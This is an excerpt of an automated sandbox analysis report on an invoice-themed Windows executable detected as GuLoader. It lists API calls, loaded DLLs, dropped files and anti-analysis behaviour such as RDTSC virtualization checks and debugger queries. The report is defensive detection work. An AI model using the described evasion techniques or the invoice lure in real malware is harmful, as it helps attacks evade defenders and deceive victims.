      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324EC7C03_2_324EC7C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325A24463_2_325A2446
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325944203_2_32594420
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3259E4F63_2_3259E4F6
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F05353_2_324F0535
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325B05913_2_325B0591
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324EEA803_2_324EEA80
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325AAB403_2_325AAB40
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325A6BD73_2_325A6BD7
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F28403_2_324F2840
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324FA8403_2_324FA840
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3251E8F03_2_3251E8F0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324D68B83_2_324D68B8
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325069623_2_32506962
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F29A03_2_324F29A0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325BA9A63_2_325BA9A6
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F0E593_2_324F0E59
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325AEE263_2_325AEE26
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325AEEDB3_2_325AEEDB
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32502E903_2_32502E90
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325ACE933_2_325ACE93
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32564F403_2_32564F40
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32510F303_2_32510F30
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32592F303_2_32592F30
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32532F283_2_32532F28
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324E2FC83_2_324E2FC8
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324FCFE03_2_324FCFE0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3256EFA03_2_3256EFA0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F0C003_2_324F0C00
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324E0CF23_2_324E0CF2
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32590CB53_2_32590CB5
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3258CD1F3_2_3258CD1F
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324FAD003_2_324FAD00
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324EADE03_2_324EADE0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32508DBF3_2_32508DBF
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: String function: 32525130 appears 58 times
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: String function: 3255EA12 appears 82 times
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: String function: 3256F290 appears 103 times
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: String function: 324DB970 appears 280 times
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: String function: 32537E54 appears 111 times
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeStatic PE information: invalid certificate
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000000.00000000.2031772150.0000000000461000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamespaltedefinitionens evalueringsrutinernes.exeDVarFileInfo$ vs FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000003.2425080993.000000003227F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000003.2427171731.0000000032433000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000000.2333715520.0000000000461000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamespaltedefinitionens evalueringsrutinernes.exeDVarFileInfo$ vs FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeBinary or memory string: OriginalFilenamespaltedefinitionens evalueringsrutinernes.exeDVarFileInfo$ vs FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: classification engineClassification label: mal76.troj.evad.winEXE@3/6@0/1
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 0_2_004036D7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,0_2_004036D7
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 0_2_00404060 GetDlgItem,SetWindowTextW,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,EnableWindow,0_2_00404060
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 0_2_0040234F LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,0_2_0040234F
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeFile created: C:\Users\user\AppData\Local\Temp\nsgDAA0.tmpJump to behavior
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeVirustotal: Detection: 55%
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeReversingLabs: Detection: 42%
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeFile read: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe "C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe"
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeProcess created: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe "C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe"
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeProcess created: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe "C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe"Jump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeSection loaded: dwmapi.dllJump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeSection loaded: oleacc.dllJump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeSection loaded: riched20.dllJump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeSection loaded: usp10.dllJump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeSection loaded: msls31.dllJump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: mshtml.pdb source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000001.2336374289.0000000000649000.00000008.00000001.01000000.00000007.sdmp
      Source: Binary string: wntdll.pdbUGP source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmp, FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000003.2427171731.0000000032306000.00000004.00000020.00020000.00000000.sdmp, FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000003.2425080993.000000003215C000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmp, FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000003.2427171731.0000000032306000.00000004.00000020.00020000.00000000.sdmp, FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000003.2425080993.000000003215C000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mshtml.pdbUGP source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000001.2336374289.0000000000649000.00000008.00000001.01000000.00000007.sdmp

      Data Obfuscation

      barindex
      Yara detected GuLoader
      Source: Yara matchFile source: 00000000.00000002.2338207417.0000000004B8E000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 0_2_6FA42351 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_6FA42351
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324B135E push eax; iretd 3_2_324B1369
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324B225F pushad ; ret 3_2_324B27F9
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324B27FA pushad ; ret 3_2_324B27F9
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324B283D push eax; iretd 3_2_324B2858
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324E09AD push ecx; mov dword ptr [esp], ecx3_2_324E09B6
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeFile created: C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeFile created: C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\LangDLL.dllJump to dropped file
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Switches to a custom stack to bypass stack traces
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeAPI/Special instruction interceptor: Address: 4F46F34
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeAPI/Special instruction interceptor: Address: 1B66F34
      Tries to detect virtualization through RDTSC time measurements
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeRDTSC instruction interceptor: First address: 4F06F11 second address: 4F06F11 instructions: 0x00000000 rdtsc 0x00000002 cmp dl, bl 0x00000004 cmp ebx, ecx 0x00000006 jc 00007FB4607F0888h 0x00000008 inc ebp 0x00000009 inc ebx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeRDTSC instruction interceptor: First address: 1B26F11 second address: 1B26F11 instructions: 0x00000000 rdtsc 0x00000002 cmp dl, bl 0x00000004 cmp ebx, ecx 0x00000006 jc 00007FB4608A1FC8h 0x00000008 inc ebp 0x00000009 inc ebx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3255D1C0 rdtsc 3_2_3255D1C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\LangDLL.dllJump to dropped file
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeEvaded block: after key decisiongraph_0-4539
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeAPI coverage: 0.2 %
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 0_2_004066F4 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_004066F4
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 0_2_004065AA FindFirstFileW,FindClose,0_2_004065AA
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 0_2_00402B75 FindFirstFileW,0_2_00402B75
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000003.2425454918.000000000238C000.00000004.00000020.00020000.00000000.sdmp, FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000002.2758773774.000000000238C000.00000004.00000020.00020000.00000000.sdmp, FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000003.2425354162.000000000238C000.00000004.00000020.00020000.00000000.sdmp, FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000002.2758695110.0000000002356000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000003.2425454918.000000000238C000.00000004.00000020.00020000.00000000.sdmp, FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000002.2758773774.000000000238C000.00000004.00000020.00020000.00000000.sdmp, FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000003.2425354162.000000000238C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWTQG
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeAPI call chain: ExitProcess graph end nodegraph_0-4430
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3255D1C0 rdtsc 3_2_3255D1C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 0_2_00402048 LdrInitializeThunk,ShowWindow,EnableWindow,0_2_00402048
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 0_2_6FA42351 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_6FA42351
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3256D250 mov ecx, dword ptr fs:[00000030h]3_2_3256D250
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324D9240 mov eax, dword ptr fs:[00000030h]3_2_324D9240
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324D9240 mov eax, dword ptr fs:[00000030h]3_2_324D9240
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3259B256 mov eax, dword ptr fs:[00000030h]3_2_3259B256
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3259B256 mov eax, dword ptr fs:[00000030h]3_2_3259B256
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3251724D mov eax, dword ptr fs:[00000030h]3_2_3251724D
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32521270 mov eax, dword ptr fs:[00000030h]3_2_32521270
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32521270 mov eax, dword ptr fs:[00000030h]3_2_32521270
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32509274 mov eax, dword ptr fs:[00000030h]3_2_32509274
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325AD26B mov eax, dword ptr fs:[00000030h]3_2_325AD26B
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325AD26B mov eax, dword ptr fs:[00000030h]3_2_325AD26B
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32517208 mov eax, dword ptr fs:[00000030h]3_2_32517208
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32517208 mov eax, dword ptr fs:[00000030h]3_2_32517208
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325B5227 mov eax, dword ptr fs:[00000030h]3_2_325B5227
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3250F2D0 mov eax, dword ptr fs:[00000030h]3_2_3250F2D0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3250F2D0 mov eax, dword ptr fs:[00000030h]3_2_3250F2D0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324E92C5 mov eax, dword ptr fs:[00000030h]3_2_324E92C5
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324E92C5 mov eax, dword ptr fs:[00000030h]3_2_324E92C5
